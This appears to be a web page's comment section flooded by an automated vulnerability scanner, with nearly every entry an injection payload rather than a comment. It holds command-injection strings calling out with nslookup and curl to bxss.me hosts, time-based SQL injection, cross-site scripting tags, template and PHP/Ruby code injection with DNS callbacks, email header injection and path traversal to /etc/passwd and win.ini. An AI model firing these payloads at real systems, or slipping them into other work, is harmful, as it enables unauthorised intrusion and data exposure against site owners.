sOdPqaAH
12/01/2024

(nslookup -q=cname hitnynevyyccp5f9dd.bxss.me||curl hitnynevyyccp5f9dd.bxss.me))

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

$(nslookup -q=cname hitzqahkyynea54dac.bxss.me||curl hitzqahkyynea54dac.bxss.me)

image
sOdPqaAH
12/01/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
sOdPqaAH
12/01/2024

&nslookup -q=cname hitntshvxbxzu4467a.bxss.me&'\"`0&nslookup -q=cname hitntshvxbxzu4467a.bxss.me&`'

image
sOdPqaAH<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
sOdPqaAH
12/01/2024

${10000069+9999526}

image
sOdPqaAH
12/01/2024

|(nslookup -q=cname hitkhavpohlcy6c739.bxss.me||curl hitkhavpohlcy6c739.bxss.me)

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

`(nslookup -q=cname hithxpnmtnjxub6767.bxss.me||curl hithxpnmtnjxub6767.bxss.me)`

image
&echo hbnbkv$()\ utqyuv\nz^xyu||a #' &echo hbnbkv$()\ utqyuv\nz^xyu||a #|" &echo hbnbkv$()\ utqyuv\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
|echo ujgoot$()\ fjbroc\nz^xyu||a #' |echo ujgoot$()\ fjbroc\nz^xyu||a #|" |echo ujgoot$()\ fjbroc\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH|echo yohepb$()\ hxdhpe\nz^xyu||a #' |echo yohepb$()\ hxdhpe\nz^xyu||a #|" |echo yohepb$()\ hxdhpe\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

BKw3EUJF

image
sOdPqaAH
12/01/2024

)

image
(nslookup -q=cname hitmnjbctnngha8882.bxss.me||curl hitmnjbctnngha8882.bxss.me))
12/01/2024

1

image
sOdPqaAH
12/01/2024

!(()&&!|*|*|

image
sOdPqaAH
12/01/2024

-1 OR 2+248-248-1=0+0+0+1 --

image
$(nslookup -q=cname hitcpbxtwtmnl05549.bxss.me||curl hitcpbxtwtmnl05549.bxss.me)
12/01/2024

1

image
sOdPqaAH
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
sOdPqaAH
12/01/2024

^(#$!@#$)(()))******

image
&nslookup -q=cname hitsqybykzbdu87dda.bxss.me&'\"`0&nslookup -q=cname hitsqybykzbdu87dda.bxss.me&`'
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1 OR 2+109-109-1=0+0+0+1

image
)
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1' OR 2+28-28-1=0+0+0+1 --

image
&(nslookup -q=cname hitrvtxqqzujy711a0.bxss.me||curl hitrvtxqqzujy711a0.bxss.me)&'\"`0&(nslookup -q=cname hitrvtxqqzujy711a0.bxss.me||curl hitrvtxqqzujy711a0.bxss.me)&`'
12/01/2024

1

image
!(()&&!|*|*|
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1' OR 2+763-763-1=0+0+0+1 or 'f3wFqWo8'='

image
|(nslookup -q=cname hitussoiqknfce4ebc.bxss.me||curl hitussoiqknfce4ebc.bxss.me)
12/01/2024

1

image
^(#$!@#$)(()))******
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1" OR 2+642-642-1=0+0+0+1 --

image
sOdPqaAH
12/01/2024

'.gethostbyname(lc('hitdg'.'mabdvihe57fc3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(67).chr(99).chr(90).'

image
`(nslookup -q=cname hitxlamgcwflxe7838.bxss.me||curl hitxlamgcwflxe7838.bxss.me)`
12/01/2024

1

image
sOdPqaAH
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
sOdPqaAH
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
sOdPqaAH
12/01/2024

".gethostbyname(lc("hitoi"."thlfobqa05da0.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(84).chr(97).chr(70)."

image
sOdPqaAH
12/01/2024

/etc/shells

image
;(nslookup -q=cname hitzxmdsjxaqe50f11.bxss.me||curl hitzxmdsjxaqe50f11.bxss.me)|(nslookup -q=cname hitzxmdsjxaqe50f11.bxss.me||curl hitzxmdsjxaqe50f11.bxss.me)&(nslookup -q=cname hitzxmdsjxaqe50f11.bxss.me||curl hitzxmdsjxaqe50f11.bxss.me)
12/01/2024

1

image
'.gethostbyname(lc('hitmb'.'eywytkhmfd669.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(76).chr(122).chr(89).'
12/01/2024

1

image
sOdPqaAH
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
".gethostbyname(lc("hitpx"."xnkksgqrbc892.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(76).chr(105).chr(69)."
12/01/2024

1

image
sOdPqaAH
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
sOdPqaAH
12/01/2024

bxss.me

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
12/01/2024

1

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
/etc/shells
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

kSNTWcN9'; waitfor delay '0:0:15' --

image
bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

1 bcc:0.710-28208.710.af90b.19734.2@bxss.me

image
sOdPqaAH
12/01/2024

1tNFehU6'); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

8jPWdj7c')); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

to@example.com> bcc:0.710-28209.710.af90b.19734.2@bxss.me

image
sOdPqaAH
12/01/2024

-5 OR 600=(SELECT 600 FROM PG_SLEEP(15))--

image
sOdPqaAH bcc:0.710-28210.710.af90b.19734.2@bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"()

image
to@example.com> bcc:0.710-28211.710.af90b.19734.2@bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
sOdPqaAH
12/01/2024

1'&&sleep(27*1000)*jnrcar&&'

image
sOdPqaAH
12/01/2024

-5) OR 183=(SELECT 183 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

';print(md5(31337));$a='

image
sOdPqaAH
12/01/2024

1"&&sleep(27*1000)*liqncj&&"

image
sOdPqaAH
12/01/2024

";print(md5(31337));$a="

image
sOdPqaAH
12/01/2024

-1)) OR 514=(SELECT 514 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

1'||sleep(27*1000)*chbmpo||'

image
sOdPqaAH
12/01/2024

qGsHvhFu' OR 588=(SELECT 588 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

${@print(md5(31337))}

image
sOdPqaAH
12/01/2024

1"||sleep(27*1000)*rwewhm||"

image
sOdPqaAH
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
';print(md5(31337));$a='
12/01/2024

1

image
sOdPqaAH
12/01/2024

HttP://bxss.me/t/xss.html?%00

image
sOdPqaAH
12/01/2024

1'"

image
";print(md5(31337));$a="
12/01/2024

1

image
sOdPqaAH
12/01/2024

bxss.me/t/xss.html?%00

image
${@print(md5(31337))}
12/01/2024

1

image
HttP://bxss.me/t/xss.html?%00
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
'"()
12/01/2024

1

image
'.print(md5(31337)).'
12/01/2024

1

image
sOdPqaAH'&&sleep(27*1000)*qgemcr&&'
12/01/2024

1

image
sOdPqaAH"&&sleep(27*1000)*azgold&&"
12/01/2024

1

image
sOdPqaAH
12/01/2024

@@QScHp

image
sOdPqaAH
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(98).concat(79).concat(117).concat(73)+(require"socket" Socket.gethostbyname("hitur"+"gdqxdijh33372.bxss.me.")[3].to_s)+"

image
sOdPqaAH'||sleep(27*1000)*ckojmz||'
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH"||sleep(27*1000)*yxlybz||"
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(109).concat(88).concat(107).concat(76)+(require"socket" Socket.gethostbyname("hitit"+"oqbdekdef8a41.bxss.me.")[3].to_s)+"
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(106).concat(77).concat(113).concat(90)+(require'socket' Socket.gethostbyname('hitzu'+'amibxsyf28ff7.bxss.me.')[3].to_s)+'
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment

image
sOdPqaAH
12/01/2024

xfs.bxss.me

image
xfs.bxss.me
12/01/2024

1

image
woGwwtvr
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment/.

image
comment
12/01/2024

1

image
comment
12/01/2024

1

image
-1 OR 2+529-529-1=0+0+0+1
12/01/2024

1

image
-1' OR 2+42-42-1=0+0+0+1 or '7OI3fbyB'='
12/01/2024

1

image
-1" OR 2+444-444-1=0+0+0+1 --
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
sOdPqaAH
12/01/2024

<!--

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
'"
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >8KrN(9123)</ScRiPt>

image
XQAfUcTt'; waitfor delay '0:0:15' --
12/01/2024

1

image
sOdPqaAH
12/01/2024

19391922

image
Y12RwiR6'); waitfor delay '0:0:15' --
12/01/2024

1

image
sOdPqaAH9062289
12/01/2024

1

image
IazDiuWo' OR 598=(SELECT 598 FROM PG_SLEEP(15))--
12/01/2024

1

image
AHvLIIen') OR 665=(SELECT 665 FROM PG_SLEEP(15))--
12/01/2024

1

image
slLJyIMe')) OR 673=(SELECT 673 FROM PG_SLEEP(15))--
12/01/2024

1

image
sOdPqaAH
12/01/2024

19115491

image
sOdPqaAH'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

bfg10778<s1﹥s2ʺs3ʹhjl10778

image
sOdPqaAH
12/01/2024

<th:t="${dfb}#foreach

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
dfb{{98991*97996}}xca
12/01/2024

1

image
sOdPqaAH
12/01/2024

<th:t="${dfb}#foreach

image
sOdPqaAH
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

dfb[[${98991*97996}]]xca

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
sOdPqaAH
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
sOdPqaAH
12/01/2024

19331"();}]9762

image
sOdPqaAH
12/01/2024

%31%39%35%37%34%22%28%29%3B%7D%5D%39%36%38%30

image
sOdPqaAH<ScRiPt >QonP(9387)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb#{98991*97996}xca

image
sOdPqaAH<script>QonP(9920)</script>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb{@98991*97996}xca

image
sOdPqaAH<script>QonP(9681)</script>9681
12/01/2024

1

image
sOdPqaAH
12/01/2024

")dfb@(98991*97996)xca

image
bfg5224<s1﹥s2ʺs3ʹhjl5224
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb#set($x=98991*97996)${x}xca

image
sOdPqaAH<ScRiPt >QonP(9897)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb{{"abc"|title}}xca

image
<th:t="${dfb}#foreach
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"print("dfb" . 98991*97996 . "xca");

image
sOdPqaAH<isindex type=image src=1 onerror=QonP(9040)>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"98991*97996*98991*97996

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

image
sOdPqaAH
12/01/2024

"}}}dfb{{{this}}}xca

image
sOdPqaAH<img src=//xss.bxss.me/t/dot.gif onload=QonP(9427)>
12/01/2024

1

image
sOdPqaAH</script><script>8KrN(9229)</script>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}#{98991*97996*98991*97996}

image
sOdPqaAH<img src=xyz OnErRor=QonP(9313)>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}}dfb{{'abcd'.toUpperCase()}}xca

image
sOdPqaAH
12/01/2024

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

image
sOdPqaAH&lt;ScRiPt&gt;QonP(9543)&lt;/sCripT&gt;
12/01/2024

1

image
sOdPqaAH<input autofocus onfocus=QonP(9779)>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb[[${98991*97996}]]xca

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"dfb__${98991*97996}__::.x

image
sOdPqaAH
12/01/2024

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
sOdPqaAH
12/01/2024

'}}dfb{{98991*97996}}xca

image
sOdPqaAHjJbbp <ScRiPt >QonP(9036)</ScRiPt>
12/01/2024

1

image
sOdPqaAH<W7OPMH>PKHAY[!+!]</W7OPMH>
12/01/2024

1

image
sOdPqaAH
12/01/2024

'}dfb{98991*97996}xca

image
sOdPqaAH
12/01/2024

'}dfb${98991*97996}xca

image
sOdPqaAH
12/01/2024

'}dfb#{98991*97996}xca

image
sOdPqaAH<aZTLjE7 x=9152>
12/01/2024

1

image
sOdPqaAH
12/01/2024

'}dfb{@98991*97996}xca

image
sOdPqaAH
12/01/2024

'}}dfb{{=98991*97996}}xca

image
sOdPqaAH<aE2NRaZ<
12/01/2024

1

image
sOdPqaAH
12/01/2024

'%>dfb<%=98991*97996%>xca

image
sOdPqaAH
12/01/2024

'}dfb#set($x=98991*97996)${x}xca

image
sOdPqaAH
12/01/2024

'98991*97996*98991*97996

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

'}dfb#{xca}=123

image
sOdPqaAH
12/01/2024

'}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

'}dfb[[${98991*97996}]]xca

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1%}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

1}dfb{98991*97996}xca

image
sOdPqaAH
12/01/2024

1}dfb{@98991*97996}xca

image
sOdPqaAH
12/01/2024

1}}dfb{{=98991*97996}}xca

image
sOdPqaAH
12/01/2024

1)dfb@(98991*97996)xca

image
sOdPqaAH
12/01/2024

1%>dfb<%=98991*97996%>xca

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1}dfb{{"abc"|title}}xca

image
sOdPqaAH
12/01/2024

1}dfb#{xca}=123

image
sOdPqaAH
12/01/2024

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1<script>dLlM(9440)</script>

image
sOdPqaAH
12/01/2024

1<ScRiPt >dLlM(9354)</ScRiPt>

image
sOdPqaAH
12/01/2024

1<isindex type=image src=1 onerror=dLlM(9773)>

image
sOdPqaAH
12/01/2024

1<body onload=dLlM(9830)>

image
sOdPqaAH
12/01/2024

1<img src=xyz OnErRor=dLlM(9646)>

image
sOdPqaAH
12/01/2024

1<img/src=">" onerror=alert(9088)>

image
sOdPqaAH
12/01/2024

%31%3C%53%63%52%69%50%74%20%3E%64%4C%6C%4D%289027%29%3C%2F%73%43%72%69%70%54%3E

image
sOdPqaAH
12/01/2024

1\u003CScRiPt\dLlM(9596)\u003C/sCripT\u003E

image
sOdPqaAH
12/01/2024

1&lt;ScRiPt&gt;dLlM(9292)&lt;/sCripT&gt;

image
sOdPqaAH
12/01/2024

1av0bF <ScRiPt >dLlM(9388)</ScRiPt>

image
sOdPqaAH
12/01/2024

1<WXM08D>MCKER[!+!]</WXM08D>

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >3cHj(9566)</ScRiPt>

image
1ClbQep0s6O
12/01/2024

1

image
HfjNUlYZ
12/01/2024

BP7r5Wka

image
HfjNUlYZ
12/01/2024

-1 OR 2+732-732-1=0+0+0+1 --

image
HfjNUlYZ
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
HfjNUlYZ
12/01/2024

-1; waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

dfb{98991*97996}xca

image
HfjNUlYZ
12/01/2024

-1); waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

-1)); waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

1 waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
-1 OR 2+435-435-1=0+0+0+1
12/01/2024

1

image
66mpbpBn'); waitfor delay '0:0:15' --
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1&echo zaenfw$()\ jrhnar\nz^xyu||a #' &echo zaenfw$()\ jrhnar\nz^xyu||a #|" &echo zaenfw$()\ jrhnar\nz^xyu||a #

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{{this}}}xca

image
HfjNUlYZ
12/01/2024

^(#$!@#$)(()))******

image
HfjNUlYZ
12/01/2024

1

image
&echo zbbtnx$()\ uqrjnh\nz^xyu||a #' &echo zbbtnx$()\ uqrjnh\nz^xyu||a #|" &echo zbbtnx$()\ uqrjnh\nz^xyu||a #
12/01/2024

1

image
&(nslookup -q=cname hitlrwpllgxfca5af0.bxss.me||curl hitlrwpllgxfca5af0.bxss.me)&'\"`0&(nslookup -q=cname hitlrwpllgxfca5af0.bxss.me||curl hitlrwpllgxfca5af0.bxss.me)&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'&&sleep(27*1000)*kabmdk&&'

image
'"()
12/01/2024

1

image
HfjNUlYZ'&&sleep(27*1000)*bqylgf&&'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1 bcc:0.700-26720.700.8792a.19734.2@bxss.me

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

";print(md5(31337));$a="

image
HfjNUlYZ
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(110).concat(79).concat(101).concat(84)+(require"socket" Socket.gethostbyname("hitrc"+"vagdqawtd056d.bxss.me.")[3].to_s)+"

image
';print(md5(31337));$a='
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

<th:t="${dfb}#foreach

image
HfjNUlYZ
12/01/2024

1<body onload=3cHj(9060)>

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

1Em0Ln <ScRiPt >3cHj(9756)</ScRiPt>

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<aqLB3ma x=9877>

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
HfjNUlYZ</script><script>60n1(9859)</script>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
"+response.write(9079377*9406867)+"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ&echo xcixjq$()\ xbkswh\nz^xyu||a #' &echo xcixjq$()\ xbkswh\nz^xyu||a #|" &echo xcixjq$()\ xbkswh\nz^xyu||a #
12/01/2024

1

image
|echo zgmkpw$()\ xhafhv\nz^xyu||a #' |echo zgmkpw$()\ xhafhv\nz^xyu||a #|" |echo zgmkpw$()\ xhafhv\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ|echo fbfbzu$()\ zeooqy\nz^xyu||a #' |echo fbfbzu$()\ zeooqy\nz^xyu||a #|" |echo fbfbzu$()\ zeooqy\nz^xyu||a #
12/01/2024

1

image
(nslookup -q=cname hitnvhrynpyvg455d2.bxss.me||curl hitnvhrynpyvg455d2.bxss.me))
12/01/2024

1

image
HfjNUlYZ
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
HfjNUlYZ
12/01/2024

1

image
c:/windows/win.ini
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1 OR 2+730-730-1=0+0+0+1 --

image
HfjNUlYZ
12/01/2024

-1 OR 3+730-730-1=0+0+0+1 --

image
HfjNUlYZ
12/01/2024

-1' OR 2+237-237-1=0+0+0+1 or '5xxHL9P4'='

image
HfjNUlYZ
12/01/2024

-1' OR 3+237-237-1=0+0+0+1 or '5xxHL9P4'='

image
';print(md5(31337));$a='
12/01/2024

1

image
HfjNUlYZ
12/01/2024

y7leaHcw'); waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
HfjNUlYZ
12/01/2024

TZ9lA8CI')); waitfor delay '0:0:15' --

image
HttP://bxss.me/t/xss.html?%00
12/01/2024

1

image
HfjNUlYZ
12/01/2024

R42hMLno' OR 871=(SELECT 871 FROM PG_SLEEP(15))--

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"

image
'"
12/01/2024

1

image
<!--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
AuTtNiKd
12/01/2024

1

image
CMsX3A2a')) OR 662=(SELECT 662 FROM PG_SLEEP(15))--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bfg2285<s1﹥s2ʺs3ʹhjl2285

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

dfb[[${98991*97996}]]xca

image
bfg6061<s1﹥s2ʺs3ʹhjl6061
12/01/2024

1

image
dfb{#98991*97996}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1 OR 2+424-424-1=0+0+0+1

image
XcwJRDFY
12/01/2024

-1' OR 2+358-358-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
Z1Z2a3pQSlE=
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1); waitfor delay '0:0:15' --

image
'+response.write(9453455*9650168)+'
12/01/2024

1

image
XcwJRDFY
12/01/2024

CwyCRy5S' OR 603=(SELECT 603 FROM PG_SLEEP(15))--

image
"+response.write(9453455*9650168)+"
12/01/2024

1

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
XcwJRDFY
12/01/2024

file:///etc/passwd

image
XcwJRDFY
12/01/2024

grgLmuIF')) OR 719=(SELECT 719 FROM PG_SLEEP(15))--

image
${10000293+9999868}
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
echo fmmqxt$()\ vrulhr\nz^xyu||a #' &echo fmmqxt$()\ vrulhr\nz^xyu||a #|" &echo fmmqxt$()\ vrulhr\nz^xyu||a #
12/01/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
&echo zbjkud$()\ xezbct\nz^xyu||a #' &echo zbjkud$()\ xezbct\nz^xyu||a #|" &echo zbjkud$()\ xezbct\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

Http://bxss.me/t/fit.txt

image
XcwJRDFY
12/01/2024

";print(md5(31337));$a="

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
XcwJRDFY
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(99).concat(70).concat(106).concat(71)+(require"socket" Socket.gethostbyname("hitze"+"sdsykcalacef9.bxss.me.")[3].to_s)+"

image
comment
12/01/2024

1

image
XcwJRDFY
12/01/2024

19325956

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH'"()&%<zzz><ScRiPt >vE7M(9573)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"()&%<zzz><ScRiPt >C67o(9344)</ScRiPt>

image
'"()&%<zzz><ScRiPt >vE7M(9347)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >TMUd(9234)</ScRiPt>

image
sOdPqaAH'"()&%<zzz><ScRiPt >nuD9(9241)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >wk39(9736)</ScRiPt>

image
sOdPqaAH
12/01/2024

'"()&%<zzz><ScRiPt >TMUd(9204)</ScRiPt>

image
sOdPqaAH
12/01/2024

'"()&%<zzz><ScRiPt >wk39(9398)</ScRiPt>

image
'"()&%<zzz><ScRiPt >nuD9(9688)</ScRiPt>
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
sOdPqaAH<WR10HE>GQSYI[!+!]</WR10HE>
12/01/2024

1

image
sOdPqaAH<script>nuD9(9653)</script>
12/01/2024

1

image
sOdPqaAH<script>nuD9(9293)</script>9293
12/01/2024

1

image
sOdPqaAH<ScRiPt >nuD9(9971)</ScRiPt>
12/01/2024

1

image
sOdPqaAH<img src=xyz OnErRor=nuD9(9878)>
12/01/2024

1

image
sOdPqaAH\u003CScRiPt\nuD9(9817)\u003C/sCripT\u003E
12/01/2024

1

image
sOdPqaAH<input autofocus onfocus=nuD9(9697)>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
sOdPqaAH}body{zzz:Expre/**/SSion(nuD9(9520))}
12/01/2024

1

image
sOdPqaAHTan36 <ScRiPt >nuD9(9019)</ScRiPt>
12/01/2024

1

image
sOdPqaAH<WCQEGH>0EMWC[!+!]</WCQEGH>
12/01/2024

1

image
sOdPqaAH<a6aL1P5<
12/01/2024

1

image
HfjNUlYZ
12/01/2024

19262376

image
HfjNUlYZ
12/01/2024

bfg3190<s1﹥s2ʺs3ʹhjl3190

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

"}dfb#{98991*97996}xca

image
HfjNUlYZ
12/01/2024

"}}dfb{{=98991*97996}}xca

image
HfjNUlYZ
12/01/2024

"98991*97996*98991*97996

image
HfjNUlYZ
12/01/2024

'}dfb{#98991*97996}xca

image
HfjNUlYZ
12/01/2024

')dfb@(98991*97996)xca

image
HfjNUlYZ
12/01/2024

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

image
HfjNUlYZ
12/01/2024

'}}}dfb{{{this}}}xca

image
HfjNUlYZ
12/01/2024

1}}dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

1%>dfb<%=98991*97996%>xca

image
HfjNUlYZ
12/01/2024

1}dfb#set($x=98991*97996)${x}xca

image
HfjNUlYZ
12/01/2024

1print("dfb" . 98991*97996 . "xca");

image
HfjNUlYZ
12/01/2024

1}}}dfb{{{this}}}xca

image
HfjNUlYZ
12/01/2024

